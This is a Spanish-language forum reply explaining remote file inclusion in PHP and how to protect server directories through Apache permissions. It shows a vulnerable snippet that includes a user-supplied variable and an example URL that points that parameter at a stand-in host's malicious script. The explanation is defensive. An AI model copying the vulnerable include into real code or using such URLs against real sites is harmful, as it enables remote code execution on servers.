Creo q lo q tu has leido es algo como esto:

si tienes un:
llamar_fichero.php
<?
include($algunarchivo);
?>

y lo llmas asi:
llamar_fichero.php?algunarchivo=http://taltal.com/scriptmalicioso.php

Por ahi te podrian ejecutar algun script o mas cosas ..

Bien . si es asi .. se usan las expresiones regulares para ver detalles sobre el Host q hace referencia etc ...

Pero .. Si no usas eso (q por cierto hay mas metodos mas seguros para hacer un include de ese tipo) .. El proteger o no un directorio de tu servidor .. no depende de PHP sino de los permisos de acceso q les des en tu Servidor HTTP .. bien sea con un .httpdaccess .. o directamente sobre el la configuracion de tu servidor HTTP .. (si usas apache . edita tu httpd.conf y veras un apartado <directory /> .. y ahi unos permisos </directory>)

Podrias publicar el articulo/pagina q dices q vistes a ver si es eso o no ...

Un saludo,